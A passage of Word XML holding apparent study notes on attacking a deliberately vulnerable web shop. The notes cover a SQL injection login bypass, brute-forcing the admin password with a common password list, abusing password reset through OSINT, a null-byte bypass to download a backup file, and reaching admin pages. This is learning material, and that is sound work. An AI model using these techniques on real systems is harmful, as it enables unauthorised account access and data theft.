          <w:numId w:val="5"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>“’” will close brackets in SQL query</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="177527A8" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>“OR” is an SQL Boolean which will return true if either side is true, as 1=1 is true, the whole statement is true</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="047F0584" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>This tells the server the email is valid and logs into user id 0, the admin account</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1803563F" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>“- -“ comments out data, any restrictions on the login will no longer work as they are interpreted as a comment</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="531078B1" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>Intercept another login attempt and edit a correct email (found through reading item comments)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39F2F4EB" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>Because email is confirmed true, adding “ ‘- -“ to the end of the email will bypass login system</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38AAB450" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>1=1 can be used when email/username is not known or invalid</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07D42BD8" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>EXPLOITING AUTHENTICATION THROUGH DIFFERENT FLAWS</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71A2BB95" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>Mechanisms vulnerable to manipulation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B03333A" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>Weak passwords in high privileged accounts</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14D0E15C" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>Forgotten password pages</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C623D1F" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>Intercept admin login attempt and forward attempt to Intruder for brute-force password attempt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FCF98AA" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>Sniper</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A2099C2" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>Best1050.txt from seclists (apt-get install seclists)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FB785CF" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>/usr/share/seclists/Passwords/Common-Credentials/best1050.txt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E954A57" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>200 OK result</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0051B411" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>Login</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59759617" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>Reset Password Exploit</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F0BC6C1" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>Password reset questions</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51D4862C" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>What can be found out about the user?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="612C1854" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>Hints in comments or profile information?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73AE4041" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>Reset password to your liking</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EE3F379" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:lastRenderedPageBreak/>
        <w:t>Web applications should store/transmit data safely and securely</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A005E86" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>If not correctly protected, data can become vulnerable</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B36EE01" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>Data protection is not applied consistently across the web application – certain web pages become accessible to the public</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15558677" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>Information leaked to public without knowledge/permission of developer</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D143E81" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>Checking out documents offered by web applications may reveal directories in URL which may be vulnerable</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CAE81F9" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>FTP for example</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DBD269E" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>Navigate to such directories by inputting them into the URL</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C7F4A39" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>OSINT</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A4F49D8" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>Downloading files from FTP directory</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5ED0B4D7" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>Package.json.bak</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07B67FFD" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t xml:space="preserve">Use character bypass called “Poison Null Byte” = %00, URL encoded </w:t>
      </w:r>
      <w:r w:rsidRPr="00F512ED">
        <w:sym w:font="Wingdings" w:char="F0E8"/>
      </w:r>
      <w:r w:rsidRPr="00F512ED">
        <w:t xml:space="preserve"> %2500. Add to end of URL with “.md” extension will bypass 403 error</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F58C541" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>NULL terminator which tells server to terminate at a given point, nulling the rest of the string</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B943F3C" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>Broken Access Control Exploits and Bugs</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="514A9492" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>Horizontal Privilege Escalation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35329296" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>Access data or perform an action of another user with the same level of permissions</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="702E4D65" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>Vertical Privilege Escalation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B5C11C7" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>Perform an action or access data of another user with a higher level of permissions</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5622E352" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>User Debugger on Firefox (Sources in Chrome) – Developers Menu</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1377AD70" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>Search for JS scripts of importance, such as main</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="714563B2" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>Find admin related code, path:administration</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E0EA4D8" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>Hints towards /#/administration page</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62D6ABA3" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>Login as admin and navigate to relevant admin pages</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60837CC1" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>View another users account</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F55F193" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>Shopping cart</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F2158BE" w14:textId="77777777" w:rsidR="00DC7D6C" w:rsidRPr="00F512ED" w:rsidRDefault="00DC7D6C" w:rsidP="00F512ED">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00F512ED">
        <w:t>Intercept and search GET line for indication of listing for shopping cart object</w:t>
      </w:r>
    </w:p>
